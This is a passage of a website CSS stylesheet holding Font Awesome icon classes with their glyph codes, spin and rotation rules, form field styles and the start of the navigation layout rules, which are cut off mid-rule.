left: -2.142857142857143em;
width: 2.142857142857143em;
text-align: center
}
.fa-li.fa-lg {
left: -1.8571428571428572em
}
.fa-border {
padding: .2em .25em .15em;
border: solid .08em #eee;
border-radius: .1em
}
.pull-right {
float: right
}
.pull-left {
float: left
}
.fa.pull-left {
margin-right: .3em
}
.fa.pull-right {
margin-left: .3em
}
.fa-spin {
-webkit-animation: spin 2s infinite linear;
-moz-animation: spin 2s infinite linear;
-o-animation: spin 2s infinite linear;
animation: spin 2s infinite linear
}
@-moz-keyframes spin {
0% {
-moz-transform:rotate(0deg)
}
100% {
-moz-transform:rotate(359deg)
}
}
@-webkit-keyframes spin {
0% {
-webkit-transform:rotate(0deg)
}
100% {
-webkit-transform:rotate(359deg)
}
}
@-o-keyframes spin {
0% {
-o-transform:rotate(0deg)
}
100% {
-o-transform:rotate(359deg)
}
}
@keyframes spin {
0% {
-webkit-transform:rotate(0deg);
transform:rotate(0deg)
}
100% {
-webkit-transform:rotate(359deg);
transform:rotate(359deg)
}
}
.fa-rotate-90 {
filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=1);
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg)
}
.fa-rotate-180 {
filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2);
-webkit-transform: rotate(180deg);
-moz-transform: rotate(180deg);
-ms-transform: rotate(180deg);
-o-transform: rotate(180deg);
transform: rotate(180deg)
}
.fa-rotate-270 {
filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=3);
-webkit-transform: rotate(270deg);
-moz-transform: rotate(270deg);
-ms-transform: rotate(270deg);
-o-transform: rotate(270deg);
transform: rotate(270deg)
}
.fa-flip-horizontal {
filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1);
-webkit-transform: scale(-1, 1);
-moz-transform: scale(-1, 1);
-ms-transform: scale(-1, 1);
-o-transform: scale(-1, 1);
transform: scale(-1, 1)
}
.fa-flip-vertical {
filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1);
-webkit-transform: scale(1, -1);
-moz-transform: scale(1, -1);
-ms-transform: scale(1, -1);
-o-transform: scale(1, -1);
transform: scale(1, -1)
}
.fa-stack {
position: relative;
display: inline-block;
width: 2em;
height: 2em;
line-height: 2em;
vertical-align: middle
}
.fa-stack-1x, .fa-stack-2x {
position: absolute;
left: 0;
width: 100%;
text-align: center
}
.fa-stack-1x {
line-height: inherit
}
.fa-stack-2x {
font-size: 2em
}
.fa-inverse {
color: #fff
}
.fa-glass:before {
content: "\f000"
}
.fa-music:before {
content: "\f001"
}
.fa-search:before {
content: "\f002"
}
.fa-envelope-o:before {
content: "\f003"
}
.fa-heart:before {
content: "\f004"
}
.fa-star:before {
content: "\f005"
}
.fa-star-o:before {
content: "\f006"
}
.fa-user:before {
content: "\f007"
}
.fa-film:before {
content: "\f008"
}
.fa-th-large:before {
content: "\f009"
}
.fa-th:before {
content: "\f00a"
}
.fa-th-list:before {
content: "\f00b"
}
.fa-check:before {
content: "\f00c"
}
.fa-times:before {
content: "\f00d"
}
.fa-search-plus:before {
content: "\f00e"
}
.fa-search-minus:before {
content: "\f010"
}
.fa-power-off:before {
content: "\f011"
}
.fa-signal:before {
content: "\f012"
}
.fa-gear:before, .fa-cog:before {
content: "\f013"
}
.fa-trash-o:before {
content: "\f014"
}
.fa-home:before {
content: "\f015"
}
.fa-file-o:before {
content: "\f016"
}
.fa-clock-o:before {
content: "\f017"
}
.fa-road:before {
content: "\f018"
}
.fa-download:before {
content: "\f019"
}
.fa-arrow-circle-o-down:before {
content: "\f01a"
}
.fa-arrow-circle-o-up:before {
content: "\f01b"
}
.fa-inbox:before {
content: "\f01c"
}
.fa-play-circle-o:before {
content: "\f01d"
}
.fa-rotate-right:before, .fa-repeat:before {
content: "\f01e"
}
.fa-refresh:before {
content: "\f021"
}
.fa-list-alt:before {
content: "\f022"
}
.fa-lock:before {
content: "\f023"
}
.fa-flag:before {
content: "\f024"
}
.fa-headphones:before {
content: "\f025"
}
.fa-volume-off:before {
content: "\f026"
}
.fa-volume-down:before {
content: "\f027"
}
.fa-volume-up:before {
content: "\f028"
}
.fa-qrcode:before {
content: "\f029"
}
.fa-barcode:before {
content: "\f02a"
}
.fa-tag:before {
content: "\f02b"
}
.fa-tags:before {
content: "\f02c"
}
.fa-book:before {
content: "\f02d"
}
.fa-bookmark:before {
content: "\f02e"
}
.fa-print:before {
content: "\f02f"
}
.fa-camera:before {
content: "\f030"
}
.fa-font:before {
content: "\f031"
}
.fa-bold:before {
content: "\f032"
}
.fa-italic:before {
content: "\f033"
}
.fa-text-height:before {
content: "\f034"
}
.fa-text-width:before {
content: "\f035"
}
.fa-align-left:before {
content: "\f036"
}
.fa-align-center:before {
content: "\f037"
}
.fa-align-right:before {
content: "\f038"
}
.fa-align-justify:before {
content: "\f039"
}
.fa-list:before {
content: "\f03a"
}
.fa-dedent:before, .fa-outdent:before {
content: "\f03b"
}
.fa-indent:before {
content: "\f03c"
}
.fa-video-camera:before {
content: "\f03d"
}
.fa-photo:before, .fa-image:before, .fa-picture-o:before {
content: "\f03e"
}
.fa-pencil:before {
content: "\f040"
}
.fa-map-marker:before {
content: "\f041"
}
.fa-adjust:before {
content: "\f042"
}
.fa-tint:before {
content: "\f043"
}
.fa-edit:before, .fa-pencil-square-o:before {
content: "\f044"
}
.fa-share-square-o:before {
content: "\f045"
}
.fa-check-square-o:before {
content: "\f046"
}
.fa-arrows:before {
content: "\f047"
}
.fa-step-backward:before {
content: "\f048"
}
.fa-fast-backward:before {
content: "\f049"
}
.fa-backward:before {
content: "\f04a"
}
.fa-play:before {
content: "\f04b"
}
.fa-pause:before {
content: "\f04c"
}
.fa-stop:before {
content: "\f04d"
}
.fa-forward:before {
content: "\f04e"
}
.fa-fast-forward:before {
content: "\f050"
}
.fa-step-forward:before {
content: "\f051"
}
.fa-eject:before {
content: "\f052"
}
.fa-chevron-left:before {
content: "\f053"
}
.fa-chevron-right:before {
content: "\f054"
}
.fa-plus-circle:before {
content: "\f055"
}
.fa-minus-circle:before {
content: "\f056"
}
.fa-times-circle:before {
content: "\f057"
}
.fa-check-circle:before {
content: "\f058"
}
.fa-question-circle:before {
content: "\f059"
}
.fa-info-circle:before {
content: "\f05a"
}
.fa-crosshairs:before {
content: "\f05b"
}
.fa-times-circle-o:before {
content: "\f05c"
}
.fa-check-circle-o:before {
content: "\f05d"
}
.fa-ban:before {
content: "\f05e"
}
.fa-arrow-left:before {
content: "\f060"
}
.fa-arrow-right:before {
content: "\f061"
}
.fa-arrow-up:before {
content: "\f062"
}
.fa-arrow-down:before {
content: "\f063"
}
.fa-mail-forward:before, .fa-share:before {
content: "\f064"
}
.fa-expand:before {
content: "\f065"
}
.fa-compress:before {
content: "\f066"
}
.fa-plus:before {
content: "\f067"
}
.fa-minus:before {
content: "\f068"
}
.fa-asterisk:before {
content: "\f069"
}
.fa-exclamation-circle:before {
content: "\f06a"
}
.fa-gift:before {
content: "\f06b"
}
.fa-leaf:before {
content: "\f06c"
}
.fa-fire:before {
content: "\f06d"
}
.fa-eye:before {
content: "\f06e"
}
.fa-eye-slash:before {
content: "\f070"
}
.fa-warning:before, .fa-exclamation-triangle:before {
content: "\f071"
}
.fa-plane:before {
content: "\f072"
}
.fa-calendar:before {
content: "\f073"
}
.fa-random:before {
content: "\f074"
}
.fa-comment:before {
content: "\f075"
}
.fa-magnet:before {
content: "\f076"
}
.fa-chevron-up:before {
content: "\f077"
}
.fa-chevron-down:before {
content: "\f078"
}
.fa-retweet:before {
content: "\f079"
}
.fa-shopping-cart:before {
content: "\f07a"
}
.fa-folder:before {
content: "\f07b"
}
.fa-folder-open:before {
content: "\f07c"
}
.fa-arrows-v:before {
content: "\f07d"
}
.fa-arrows-h:before {
content: "\f07e"
}
.fa-bar-chart-o:before {
content: "\f080"
}
.fa-twitter-square:before {
content: "\f081"
}
.fa-facebook-square:before {
content: "\f082"
}
.fa-camera-retro:before {
content: "\f083"
}
.fa-key:before {
content: "\f084"
}
.fa-gears:before, .fa-cogs:before {
content: "\f085"
}
.fa-comments:before {
content: "\f086"
}
.fa-thumbs-o-up:before {
content: "\f087"
}
.fa-thumbs-o-down:before {
content: "\f088"
}
.fa-star-half:before {
content: "\f089"
}
.fa-heart-o:before {
content: "\f08a"
}
.fa-sign-out:before {
content: "\f08b"
}
.fa-linkedin-square:before {
content: "\f08c"
}
.fa-thumb-tack:before {
content: "\f08d"
}
.fa-external-link:before {
content: "\f08e"
}
.fa-sign-in:before {
content: "\f090"
}
.fa-trophy:before {
content: "\f091"
}
.fa-github-square:before {
content: "\f092"
}
.fa-upload:before {
content: "\f093"
}
.fa-lemon-o:before {
content: "\f094"
}
.fa-phone:before {
content: "\f095"
}
.fa-square-o:before {
content: "\f096"
}
.fa-bookmark-o:before {
content: "\f097"
}
.fa-phone-square:before {
content: "\f098"
}
.fa-twitter:before {
content: "\f099"
}
.fa-facebook:before {
content: "\f09a"
}
.fa-github:before {
content: "\f09b"
}
.fa-unlock:before {
content: "\f09c"
}
.fa-credit-card:before {
content: "\f09d"
}
.fa-rss:before {
content: "\f09e"
}
.fa-hdd-o:before {
content: "\f0a0"
}
.fa-bullhorn:before {
content: "\f0a1"
}
.fa-bell:before {
content: "\f0f3"
}
.fa-certificate:before {
content: "\f0a3"
}
.fa-hand-o-right:before {
content: "\f0a4"
}
.fa-hand-o-left:before {
content: "\f0a5"
}
.fa-hand-o-up:before {
content: "\f0a6"
}
.fa-hand-o-down:before {
content: "\f0a7"
}
.fa-arrow-circle-left:before {
content: "\f0a8"
}
.fa-arrow-circle-right:before {
content: "\f0a9"
}
.fa-arrow-circle-up:before {
content: "\f0aa"
}
.fa-arrow-circle-down:before {
content: "\f0ab"
}
.fa-globe:before {
content: "\f0ac"
}
.fa-wrench:before {
content: "\f0ad"
}
.fa-tasks:before {
content: "\f0ae"
}
.fa-filter:before {
content: "\f0b0"
}
.fa-briefcase:before {
content: "\f0b1"
}
.fa-arrows-alt:before {
content: "\f0b2"
}
.fa-group:before, .fa-users:before {
content: "\f0c0"
}
.fa-chain:before, .fa-link:before {
content: "\f0c1"
}
.fa-cloud:before {
content: "\f0c2"
}
.fa-flask:before {
content: "\f0c3"
}
.fa-cut:before, .fa-scissors:before {
content: "\f0c4"
}
.fa-copy:before, .fa-files-o:before {
content: "\f0c5"
}
.fa-paperclip:before {
content: "\f0c6"
}
.fa-save:before, .fa-floppy-o:before {
content: "\f0c7"
}
.fa-square:before {
content: "\f0c8"
}
.fa-navicon:before, .fa-reorder:before, .fa-bars:before {
content: "\f0c9"
}
.fa-list-ul:before {
content: "\f0ca"
}
.fa-list-ol:before {
content: "\f0cb"
}
.fa-strikethrough:before {
content: "\f0cc"
}
.fa-underline:before {
content: "\f0cd"
}
.fa-table:before {
content: "\f0ce"
}
.fa-magic:before {
content: "\f0d0"
}
.fa-truck:before {
content: "\f0d1"
}
.fa-pinterest:before {
content: "\f0d2"
}
.fa-pinterest-square:before {
content: "\f0d3"
}
.fa-google-plus-square:before {
content: "\f0d4"
}
.fa-google-plus:before {
content: "\f0d5"
}
.fa-money:before {
content: "\f0d6"
}
.fa-caret-down:before {
content: "\f0d7"
}
.fa-caret-up:before {
content: "\f0d8"
}
.fa-caret-left:before {
content: "\f0d9"
}
.fa-caret-right:before {
content: "\f0da"
}
.fa-columns:before {
content: "\f0db"
}
.fa-unsorted:before, .fa-sort:before {
content: "\f0dc"
}
.fa-sort-down:before, .fa-sort-desc:before {
content: "\f0dd"
}
.fa-sort-up:before, .fa-sort-asc:before {
content: "\f0de"
}
.fa-envelope:before {
content: "\f0e0"
}
.fa-linkedin:before {
content: "\f0e1"
}
.fa-rotate-left:before, .fa-undo:before {
content: "\f0e2"
}
.fa-legal:before, .fa-gavel:before {
content: "\f0e3"
}
.fa-dashboard:before, .fa-tachometer:before {
content: "\f0e4"
}
.fa-comment-o:before {
content: "\f0e5"
}
.fa-comments-o:before {
content: "\f0e6"
}
.fa-flash:before, .fa-bolt:before {
content: "\f0e7"
}
.fa-sitemap:before {
content: "\f0e8"
}
.fa-umbrella:before {
content: "\f0e9"
}
.fa-paste:before, .fa-clipboard:before {
content: "\f0ea"
}
.fa-lightbulb-o:before {
content: "\f0eb"
}
.fa-exchange:before {
content: "\f0ec"
}
.fa-cloud-download:before {
content: "\f0ed"
}
.fa-cloud-upload:before {
content: "\f0ee"
}
.fa-user-md:before {
content: "\f0f0"
}
.fa-stethoscope:before {
content: "\f0f1"
}
.fa-suitcase:before {
content: "\f0f2"
}
.fa-bell-o:before {
content: "\f0a2"
}
.fa-coffee:before {
content: "\f0f4"
}
.fa-cutlery:before {
content: "\f0f5"
}
.fa-file-text-o:before {
content: "\f0f6"
}
.fa-building-o:before {
content: "\f0f7"
}
.fa-hospital-o:before {
content: "\f0f8"
}
.fa-ambulance:before {
content: "\f0f9"
}
.fa-medkit:before {
content: "\f0fa"
}
.fa-fighter-jet:before {
content: "\f0fb"
}
.fa-beer:before {
content: "\f0fc"
}
.fa-h-square:before {
content: "\f0fd"
}
.fa-plus-square:before {
content: "\f0fe"
}
.fa-angle-double-left:before {
content: "\f100"
}
.fa-angle-double-right:before {
content: "\f101"
}
.fa-angle-double-up:before {
content: "\f102"
}
.fa-angle-double-down:before {
content: "\f103"
}
.fa-angle-left:before {
content: "\f104"
}
.fa-angle-right:before {
content: "\f105"
}
.fa-angle-up:before {
content: "\f106"
}
.fa-angle-down:before {
content: "\f107"
}
.fa-desktop:before {
content: "\f108"
}
.fa-laptop:before {
content: "\f109"
}
.fa-tablet:before {
content: "\f10a"
}
.fa-mobile-phone:before, .fa-mobile:before {
content: "\f10b"
}
.fa-circle-o:before {
content: "\f10c"
}
.fa-quote-left:before {
content: "\f10d"
}
.fa-quote-right:before {
content: "\f10e"
}
.fa-spinner:before {
content: "\f110"
}
.fa-circle:before {
content: "\f111"
}
.fa-mail-reply:before, .fa-reply:before {
content: "\f112"
}
.fa-github-alt:before {
content: "\f113"
}
.fa-folder-o:before {
content: "\f114"
}
.fa-folder-open-o:before {
content: "\f115"
}
.fa-smile-o:before {
content: "\f118"
}
.fa-frown-o:before {
content: "\f119"
}
.fa-meh-o:before {
content: "\f11a"
}
.fa-gamepad:before {
content: "\f11b"
}
.fa-keyboard-o:before {
content: "\f11c"
}
.fa-flag-o:before {
content: "\f11d"
}
.fa-flag-checkered:before {
content: "\f11e"
}
.fa-terminal:before {
content: "\f120"
}
.fa-code:before {
content: "\f121"
}
.fa-mail-reply-all:before, .fa-reply-all:before {
content: "\f122"
}
.fa-star-half-empty:before, .fa-star-half-full:before, .fa-star-half-o:before {
content: "\f123"
}
.fa-location-arrow:before {
content: "\f124"
}
.fa-crop:before {
content: "\f125"
}
.fa-code-fork:before {
content: "\f126"
}
.fa-unlink:before, .fa-chain-broken:before {
content: "\f127"
}
.fa-question:before {
content: "\f128"
}
.fa-info:before {
content: "\f129"
}
.fa-exclamation:before {
content: "\f12a"
}
.fa-superscript:before {
content: "\f12b"
}
.fa-subscript:before {
content: "\f12c"
}
.fa-eraser:before {
content: "\f12d"
}
.fa-puzzle-piece:before {
content: "\f12e"
}
.fa-microphone:before {
content: "\f130"
}
.fa-microphone-slash:before {
content: "\f131"
}
.fa-shield:before {
content: "\f132"
}
.fa-calendar-o:before {
content: "\f133"
}
.fa-fire-extinguisher:before {
content: "\f134"
}
.fa-rocket:before {
content: "\f135"
}
.fa-maxcdn:before {
content: "\f136"
}
.fa-chevron-circle-left:before {
content: "\f137"
}
.fa-chevron-circle-right:before {
content: "\f138"
}
.fa-chevron-circle-up:before {
content: "\f139"
}
.fa-chevron-circle-down:before {
content: "\f13a"
}
.fa-html5:before {
content: "\f13b"
}
.fa-css3:before {
content: "\f13c"
}
.fa-anchor:before {
content: "\f13d"
}
.fa-unlock-alt:before {
content: "\f13e"
}
.fa-bullseye:before {
content: "\f140"
}
.fa-ellipsis-h:before {
content: "\f141"
}
.fa-ellipsis-v:before {
content: "\f142"
}
.fa-rss-square:before {
content: "\f143"
}
.fa-play-circle:before {
content: "\f144"
}
.fa-ticket:before {
content: "\f145"
}
.fa-minus-square:before {
content: "\f146"
}
.fa-minus-square-o:before {
content: "\f147"
}
.fa-level-up:before {
content: "\f148"
}
.fa-level-down:before {
content: "\f149"
}
.fa-check-square:before {
content: "\f14a"
}
.fa-pencil-square:before {
content: "\f14b"
}
.fa-external-link-square:before {
content: "\f14c"
}
.fa-share-square:before {
content: "\f14d"
}
.fa-compass:before {
content: "\f14e"
}
.fa-toggle-down:before, .fa-caret-square-o-down:before {
content: "\f150"
}
.fa-toggle-up:before, .fa-caret-square-o-up:before {
content: "\f151"
}
.fa-toggle-right:before, .fa-caret-square-o-right:before {
content: "\f152"
}
.fa-euro:before, .fa-eur:before {
content: "\f153"
}
.fa-gbp:before {
content: "\f154"
}
.fa-dollar:before, .fa-usd:before {
content: "\f155"
}
.fa-rupee:before, .fa-inr:before {
content: "\f156"
}
.fa-cny:before, .fa-rmb:before, .fa-yen:before, .fa-jpy:before {
content: "\f157"
}
.fa-ruble:before, .fa-rouble:before, .fa-rub:before {
content: "\f158"
}
.fa-won:before, .fa-krw:before {
content: "\f159"
}
.fa-bitcoin:before, .fa-btc:before {
content: "\f15a"
}
.fa-file:before {
content: "\f15b"
}
.fa-file-text:before {
content: "\f15c"
}
.fa-sort-alpha-asc:before {
content: "\f15d"
}
.fa-sort-alpha-desc:before {
content: "\f15e"
}
.fa-sort-amount-asc:before {
content: "\f160"
}
.fa-sort-amount-desc:before {
content: "\f161"
}
.fa-sort-numeric-asc:before {
content: "\f162"
}
.fa-sort-numeric-desc:before {
content: "\f163"
}
.fa-thumbs-up:before {
content: "\f164"
}
.fa-thumbs-down:before {
content: "\f165"
}
.fa-youtube-square:before {
content: "\f166"
}
.fa-youtube:before {
content: "\f167"
}
.fa-xing:before {
content: "\f168"
}
.fa-xing-square:before {
content: "\f169"
}
.fa-youtube-play:before {
content: "\f16a"
}
.fa-dropbox:before {
content: "\f16b"
}
.fa-stack-overflow:before {
content: "\f16c"
}
.fa-instagram:before {
content: "\f16d"
}
.fa-flickr:before {
content: "\f16e"
}
.fa-adn:before {
content: "\f170"
}
.fa-bitbucket:before {
content: "\f171"
}
.fa-bitbucket-square:before {
content: "\f172"
}
.fa-tumblr:before {
content: "\f173"
}
.fa-tumblr-square:before {
content: "\f174"
}
.fa-long-arrow-down:before {
content: "\f175"
}
.fa-long-arrow-up:before {
content: "\f176"
}
.fa-long-arrow-left:before {
content: "\f177"
}
.fa-long-arrow-right:before {
content: "\f178"
}
.fa-apple:before {
content: "\f179"
}
.fa-windows:before {
content: "\f17a"
}
.fa-android:before {
content: "\f17b"
}
.fa-linux:before {
content: "\f17c"
}
.fa-dribbble:before {
content: "\f17d"
}
.fa-skype:before {
content: "\f17e"
}
.fa-foursquare:before {
content: "\f180"
}
.fa-trello:before {
content: "\f181"
}
.fa-female:before {
content: "\f182"
}
.fa-male:before {
content: "\f183"
}
.fa-gittip:before {
content: "\f184"
}
.fa-sun-o:before {
content: "\f185"
}
.fa-moon-o:before {
content: "\f186"
}
.fa-archive:before {
content: "\f187"
}
.fa-bug:before {
content: "\f188"
}
.fa-vk:before {
content: "\f189"
}
.fa-weibo:before {
content: "\f18a"
}
.fa-renren:before {
content: "\f18b"
}
.fa-pagelines:before {
content: "\f18c"
}
.fa-stack-exchange:before {
content: "\f18d"
}
.fa-arrow-circle-o-right:before {
content: "\f18e"
}
.fa-arrow-circle-o-left:before {
content: "\f190"
}
.fa-toggle-left:before, .fa-caret-square-o-left:before {
content: "\f191"
}
.fa-dot-circle-o:before {
content: "\f192"
}
.fa-wheelchair:before {
content: "\f193"
}
.fa-vimeo-square:before {
content: "\f194"
}
.fa-turkish-lira:before, .fa-try:before {
content: "\f195"
}
.fa-plus-square-o:before {
content: "\f196"
}
.fa-space-shuttle:before {
content: "\f197"
}
.fa-slack:before {
content: "\f198"
}
.fa-envelope-square:before {
content: "\f199"
}
.fa-wordpress:before {
content: "\f19a"
}
.fa-openid:before {
content: "\f19b"
}
.fa-institution:before, .fa-bank:before, .fa-university:before {
content: "\f19c"
}
.fa-mortar-board:before, .fa-graduation-cap:before {
content: "\f19d"
}
.fa-yahoo:before {
content: "\f19e"
}
.fa-google:before {
content: "\f1a0"
}
.fa-reddit:before {
content: "\f1a1"
}
.fa-reddit-square:before {
content: "\f1a2"
}
.fa-stumbleupon-circle:before {
content: "\f1a3"
}
.fa-stumbleupon:before {
content: "\f1a4"
}
.fa-delicious:before {
content: "\f1a5"
}
.fa-digg:before {
content: "\f1a6"
}
.fa-pied-piper-square:before, .fa-pied-piper:before {
content: "\f1a7"
}
.fa-pied-piper-alt:before {
content: "\f1a8"
}
.fa-drupal:before {
content: "\f1a9"
}
.fa-joomla:before {
content: "\f1aa"
}
.fa-language:before {
content: "\f1ab"
}
.fa-fax:before {
content: "\f1ac"
}
.fa-building:before {
content: "\f1ad"
}
.fa-child:before {
content: "\f1ae"
}
.fa-paw:before {
content: "\f1b0"
}
.fa-spoon:before {
content: "\f1b1"
}
.fa-cube:before {
content: "\f1b2"
}
.fa-cubes:before {
content: "\f1b3"
}
.fa-behance:before {
content: "\f1b4"
}
.fa-behance-square:before {
content: "\f1b5"
}
.fa-steam:before {
content: "\f1b6"
}
.fa-steam-square:before {
content: "\f1b7"
}
.fa-recycle:before {
content: "\f1b8"
}
.fa-automobile:before, .fa-car:before {
content: "\f1b9"
}
.fa-cab:before, .fa-taxi:before {
content: "\f1ba"
}
.fa-tree:before {
content: "\f1bb"
}
.fa-spotify:before {
content: "\f1bc"
}
.fa-deviantart:before {
content: "\f1bd"
}
.fa-soundcloud:before {
content: "\f1be"
}
.fa-database:before {
content: "\f1c0"
}
.fa-file-pdf-o:before {
content: "\f1c1"
}
.fa-file-word-o:before {
content: "\f1c2"
}
.fa-file-excel-o:before {
content: "\f1c3"
}
.fa-file-powerpoint-o:before {
content: "\f1c4"
}
.fa-file-photo-o:before, .fa-file-picture-o:before, .fa-file-image-o:before {
content: "\f1c5"
}
.fa-file-zip-o:before, .fa-file-archive-o:before {
content: "\f1c6"
}
.fa-file-sound-o:before, .fa-file-audio-o:before {
content: "\f1c7"
}
.fa-file-movie-o:before, .fa-file-video-o:before {
content: "\f1c8"
}
.fa-file-code-o:before {
content: "\f1c9"
}
.fa-vine:before {
content: "\f1ca"
}
.fa-codepen:before {
content: "\f1cb"
}
.fa-jsfiddle:before {
content: "\f1cc"
}
.fa-life-bouy:before, .fa-life-saver:before, .fa-support:before, .fa-life-ring:before {
content: "\f1cd"
}
.fa-circle-o-notch:before {
content: "\f1ce"
}
.fa-ra:before, .fa-rebel:before {
content: "\f1d0"
}
.fa-ge:before, .fa-empire:before {
content: "\f1d1"
}
.fa-git-square:before {
content: "\f1d2"
}
.fa-git:before {
content: "\f1d3"
}
.fa-hacker-news:before {
content: "\f1d4"
}
.fa-tencent-weibo:before {
content: "\f1d5"
}
.fa-qq:before {
content: "\f1d6"
}
.fa-wechat:before, .fa-weixin:before {
content: "\f1d7"
}
.fa-send:before, .fa-paper-plane:before {
content: "\f1d8"
}
.fa-send-o:before, .fa-paper-plane-o:before {
content: "\f1d9"
}
.fa-history:before {
content: "\f1da"
}
.fa-circle-thin:before {
content: "\f1db"
}
.fa-header:before {
content: "\f1dc"
}
.fa-paragraph:before {
content: "\f1dd"
}
.fa-sliders:before {
content: "\f1de"
}
.fa-share-alt:before {
content: "\f1e0"
}
.fa-share-alt-square:before {
content: "\f1e1"
}
.fa-bomb:before {
content: "\f1e2"
}
form {
margin: 0 0 5px 0
}
form fieldset {
padding: 0;
margin-bottom: 5px;
border-width: 0
}
form legend {
display: block;
width: 100%;
padding: 0;
margin-bottom: 10px;
*margin-left:-7px;
color: #333332;
white-space: normal;
border: 0;
border-bottom: 1px solid #ddd
}
form p {
margin-bottom: 2.5px
}
form ul {
padding: 0;
margin: 0 0 5px 0;
list-style-type: none
}
form br {
display: none
}
label, input, button, select, textarea {
vertical-align: baseline;
*vertical-align:middle
}
input, button, select, textarea {
font-family: 'PT Serif', serif;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
-ms-box-sizing: border-box;
box-sizing: border-box
}
label {
display: block;
margin-bottom: 1.25px;
font-weight: bold;
color: #333332;
cursor: pointer
}
label input, label textarea, label select {
display: block
}
input, textarea, select {
display: inline-block;
width: 100%;
padding: 4px;
margin-bottom: 1.25px;
color: #333332;
background-color: #fff;
border: 1px solid #ddd
}
input:hover, textarea:hover, select:hover {
border-color: #919191
}
.input-mini {
width: 60px
}
.input-small {
width: 90px
}
input[type="image"], input[type="checkbox"], input[type="radio"] {
width: auto;
height: auto;
padding: 0;
margin: 3px 0;
*margin-top:0;
line-height: normal;
cursor: pointer;
border: 0 \9;
-webkit-border-radius: 0;
-moz-border-radius: 0;
border-radius: 0
}
input[type="checkbox"], input[type="radio"] {
*width:13px;
*height:13px;
padding: 0;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
-ms-box-sizing: border-box;
box-sizing: border-box
}
input[type="image"] {
border: 0;
-webkit-box-shadow: none;
-moz-box-shadow: none;
box-shadow: none
}
input[type="file"] {
width: auto;
padding: initial;
line-height: initial;
background-color: transparent;
background-color: initial;
border: initial;
-webkit-box-shadow: none;
-moz-box-shadow: none;
box-shadow: none
}
input[type="button"], input[type="reset"], input[type="submit"] {
width: auto;
height: auto;
*overflow:visible;
cursor: pointer
}
select, input[type="file"] {
*margin-top:4px
}
select {
width: auto;
background-color: #fff
}
select[multiple], select[size] {
height: auto
}
textarea {
height: auto;
overflow: auto;
vertical-align: top;
resize: vertical
}
input[type="hidden"] {
display: none
}
.radio, .checkbox {
padding-left: 18px;
font-weight: normal
}
.radio input[type="radio"], .checkbox input[type="checkbox"] {
float: left;
margin-left: -18px
}
.radio.inline, .checkbox.inline {
display: inline-block;
padding-top: 5px;
margin-bottom: 0;
vertical-align: middle
}
.radio.inline+.radio.inline, .checkbox.inline+.checkbox.inline {
margin-left: 10px
}
input[disabled], select[disabled], textarea[disabled], input[readonly], select[readonly], textarea[readonly] {
cursor: not-allowed;
-webkit-opacity: .5;
-moz-opacity: .5;
opacity: .5
}
input:focus, textarea:focus {
border-color: #111;
outline: 0;
outline: thin dotted \9
}
input[type="file"]:focus, input[type="radio"]:focus, input[type="checkbox"]:focus, select:focus {
-webkit-box-shadow: none;
-moz-box-shadow: none;
box-shadow: none
}
.help-block, .help-inline {
color: #919191
}
.help-block {
display: block;
margin-bottom: 1em;
line-height: 1em
}
.help-inline {
display: inline-block;
padding-left: 5px;
vertical-align: middle
}
.form-inline input, .form-inline textarea, .form-inline select {
display: inline-block;
margin-bottom: 0
}
.form-inline label {
display: inline-block
}
.form-inline .radio, .form-inline .checkbox, .form-inline .radio {
padding-left: 0;
margin-bottom: 0;
vertical-align: middle
}
.form-inline .radio input[type="radio"], .form-inline .checkbox input[type="checkbox"] {
float: left;
margin-right: 3px;
margin-left: 0
}
.form-search input, .form-search textarea, .form-search select {
display: inline-block;
margin-bottom: 0
}
.form-search .search-query {
padding-right: 14px;
padding-left: 14px;
margin-bottom: 0;
-webkit-border-radius: 14px;
-moz-border-radius: 14px;
border-radius: 14px
}
.form-search label {
display: inline-block
}
.form-search .radio, .form-search .checkbox, .form-inline .radio {
padding-left: 0;
margin-bottom: 0;
vertical-align: middle
}
.form-search .radio input[type="radio"], .form-search .checkbox input[type="checkbox"] {
float: left;
margin-right: 3px;
margin-left: 0
}
body {
/* font-family: 'PT Serif', serif; */
font-family:"Source Sans Pro",Helvetica,Arial,sans-serif
color: #333332;
background-color: #fff
}
.navigation-wrapper {
width: 100%;
padding: 0 0 1em 0;
margin: 0 auto;
font-family: 'PT Sans Narrow', sans-serif;
font-weight: 700;
text-transform: uppercase;
*zoom:1
}
.navigation-wrapper:before, .navigation-wrapper:after {
display: table;
content: ""
}
.navigation-wrapper:after {
clear: both
}
.navigation-wrapper:before, .navigation-wrapper:after {
display: table;
line-height: 0;
content: ""
}
.navigation-wrapper:after {
clear: both
}
.site-name {
display: inline;
float: left;
float: none;
width: 83.33333333333334%;
margin-right: 8.333333333333334%;
margin-bottom: 1em;
margin-left: 8.333333333333334%;
font-size: 24px;
font-size: 1.5rem;
padding: 1em 0 0 0;
}
@media only screen and (min-width:37.5em) {
.site-name {
display: inline;
float: left;
width: 16.666666666666668%;
margin-right: 4.166666666666667%;
margin-left: 4.166666666666667%;
font-size: 16px;
font-size: 1.2rem;
padding: .2em 0 0 0;
}
}
@media only screen and (min-width:86.375em) {
.site-name {
display: inline;
float: left;
width: 12.5%;
margin-left: 16.666666666666668%
}
}
.top-navigation {
display: inline;
display: block;
float: left;
float: none;
width: 83.33333333333334%;
margin-right: 8.333333333333334%;
/*padding-bottom: 2em;*/
margin-left: 8.333333333333334%;
/* background: url("http://www.neondataskills.org/images/solely_NSF.png") no-repeat right 5% top; */
padding: .2em 0 0 0;
}
@media only screen and (min-width:37.5em) {
.top-navigation {
display: inline;
float: left;
width: 75%;
margin-right: 0;
margin-left: 0;
padding: .2em 0 0 0;
}
}
@media only screen and (min-width:86.375em) {
.top-navigation {
display: inline;
float: left;
width: 66.66666666666667%
}
}
.top-navigation ul {
padding: 0;
margin: 0;
clear: both;
list-style-type: none
}
.top-navigation li {
display: block;
font-size: 16px;
font-size: 1rem;
list-style-type: none;
border-bottom: 1px solid #ddd;
border-bottom: 1px solid rgba(17,17,17,0.1)
}
.top-navigation li:last-child {
border-bottom: 0 solid transparent
}
@media only screen and (min-width:37.5em) {
.top-navigation li {
display: inline;
margin-right: 25px;
